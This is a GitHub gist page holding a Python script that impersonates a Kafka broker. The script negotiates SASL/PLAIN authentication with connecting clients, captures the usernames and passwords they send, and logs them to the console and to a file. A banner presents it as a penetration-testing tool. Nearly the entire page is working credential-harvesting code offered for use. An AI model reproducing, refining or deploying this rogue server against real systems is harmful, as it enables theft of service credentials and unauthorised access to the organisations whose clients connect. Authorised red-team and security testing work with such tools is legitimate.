Created
December 15, 2025 07:48
-
-
Save X-Cotang/fcf1ac367f2b4a1c76a83402d796dbcf to your computer and use it in GitHub Desktop.
Fake Kafka server used to extract usernames and passwords.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import socket | |
| import struct | |
| import threading | |
| import logging | |
| from datetime import datetime | |
| logging.basicConfig( | |
| level=logging.INFO, | |
| format='%(asctime)s - %(levelname)s - %(message)s' | |
| ) | |
| class KafkaAuthCapture: | |
| def __init__(self, host='0.0.0.0', port=9092): | |
| self.host = host | |
| self.port = port | |
| self.server = None | |
| self.captured_creds = [] | |
| def parse_sasl_handshake(self, data): | |
| """Parse SASL handshake request""" | |
| try: | |
| if len(data) < 8: | |
| return None | |
| length = struct.unpack('>I', data[:4])[0] | |
| api_key = struct.unpack('>H', data[4:6])[0] | |
| logging.info(f"Received API Key: {api_key}, Length: {length}") | |
| if api_key in [17, 36]: | |
| return True | |
| except Exception as e: | |
| logging.error(f"Parse error: {e}") | |
| return None | |
| def parse_sasl_plain(self, data): | |
| try: | |
| if len(data) >= 5 and data[4:5] == b'\x00': | |
| payload = data[5:] | |
| parts = payload.split(b'\x00') | |
| if len(parts) >= 2: | |
| username = parts[0].decode('utf-8', errors='ignore') | |
| password = parts[1].decode('utf-8', errors='ignore') | |
| return { | |
| 'authzid': '', | |
| 'username': username, | |
| 'password': password, | |
| 'timestamp': datetime.now().isoformat() | |
| } | |
| null_positions = [i for i, byte in enumerate(data) if byte == 0] | |
| if len(null_positions) >= 2: | |
| for i in range(len(null_positions) - 1): | |
| start = null_positions[i] | |
| end = null_positions[i + 1] | |
| username_candidate = data[start+1:end] | |
| if i + 1 < len(null_positions): | |
| password_start = null_positions[i + 1] + 1 | |
| password_end = null_positions[i + 2] if i + 2 < len(null_positions) else len(data) | |
| password_candidate = data[password_start:password_end] | |
| if len(username_candidate) > 0 and len(password_candidate) > 0: | |
| try: | |
| username = username_candidate.decode('utf-8') | |
| password = password_candidate.decode('utf-8') | |
| if username.isprintable() and password.isprintable(): | |
| return { | |
| 'authzid': '', | |
| 'username': username, | |
| 'password': password, | |
| 'timestamp': datetime.now().isoformat() | |
| } | |
| except: | |
| continue | |
| except Exception as e: | |
| logging.error(f"SASL parse error: {e}") | |
| return None | |
| def send_response(self, client, api_key): | |
| try: | |
| if api_key == 17: | |
| response = struct.pack('>I', 0) | |
| response += struct.pack('>H', 0) | |
| response += struct.pack('>I', 1) | |
| response += struct.pack('>H', 5) | |
| response += b'PLAIN' | |
| length = struct.pack('>I', len(response)) | |
| client.send(length + response) | |
| elif api_key == 36: | |
| response = struct.pack('>I', 0) | |
| response += struct.pack('>H', 0) | |
| response += struct.pack('>I', 0) | |
| length = struct.pack('>I', len(response)) | |
| client.send(length + response) | |
| except Exception as e: | |
| logging.error(f"Send response error: {e}") | |
| def handle_client(self, client, addr): | |
| """Xử lý kết nối từ client""" | |
| logging.info(f"[+] New connection from {addr[0]}:{addr[1]}") | |
| try: | |
| while True: | |
| data = client.recv(4096) | |
| if not data: | |
| break | |
| logging.debug(f"Raw data: {data[:100].hex()}") | |
| if self.parse_sasl_handshake(data): | |
| api_key = struct.unpack('>H', data[4:6])[0] | |
| self.send_response(client, api_key) | |
| creds = self.parse_sasl_plain(data) | |
| if creds: | |
| logging.warning(f"\n{'='*60}") | |
| logging.warning(f"[!] CREDENTIALS CAPTURED from {addr[0]}:{addr[1]}") | |
| logging.warning(f" Username: {creds['username']}") | |
| logging.warning(f" Password: {creds['password']}") | |
| logging.warning(f" Time: {creds['timestamp']}") | |
| logging.warning(f"{'='*60}\n") | |
| self.captured_creds.append({ | |
| 'client': f"{addr[0]}:{addr[1]}", | |
| **creds | |
| }) | |
| with open('captured_credentials.txt', 'a') as f: | |
| f.write(f"\n[{creds['timestamp']}] {addr[0]}:{addr[1]}\n") | |
| f.write(f"Username: {creds['username']}\n") | |
| f.write(f"Password: {creds['password']}\n") | |
| f.write("-" * 60 + "\n") | |
| except Exception as e: | |
| logging.error(f"Client handler error: {e}") | |
| finally: | |
| client.close() | |
| logging.info(f"[-] Connection closed from {addr[0]}:{addr[1]}") | |
| def start(self): | |
| try: | |
| self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) | |
| self.server.bind((self.host, self.port)) | |
| self.server.listen(5) | |
| logging.info(f"[*] Kafka Auth Capture Server listening on {self.host}:{self.port}") | |
| logging.info(f"[*] Waiting for connections...") | |
| logging.info(f"[*] Captured credentials will be saved to: captured_credentials.txt\n") | |
| while True: | |
| client, addr = self.server.accept() | |
| client_thread = threading.Thread( | |
| target=self.handle_client, | |
| args=(client, addr) | |
| ) | |
| client_thread.daemon = True | |
| client_thread.start() | |
| except KeyboardInterrupt: | |
| logging.info("\n[*] Shutting down server...") | |
| self.print_summary() | |
| except Exception as e: | |
| logging.error(f"Server error: {e}") | |
| finally: | |
| if self.server: | |
| self.server.close() | |
| def print_summary(self): | |
| if self.captured_creds: | |
| print(f"\n{'='*60}") | |
| print(f"SUMMARY - Total captured: {len(self.captured_creds)} credentials") | |
| print(f"{'='*60}") | |
| for i, cred in enumerate(self.captured_creds, 1): | |
| print(f"\n{i}. Client: {cred['client']}") | |
| print(f" Username: {cred['username']}") | |
| print(f" Password: {cred['password']}") | |
| print(f" Time: {cred['timestamp']}") | |
| print(f"\n{'='*60}\n") | |
| else: | |
| print("\n[*] No credentials captured\n") | |
| if __name__ == '__main__': | |
| print(""" | |
| ╔══════════════════════════════════════════════════════╗ | |
| ║ Kafka Authentication Capture Tool ║ | |
| ║ For Penetration Testing - Use Responsibly ║ | |
| ╚══════════════════════════════════════════════════════╝ | |
| """) | |
| server = KafkaAuthCapture(host='0.0.0.0', port=9092) | |
| server.start() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment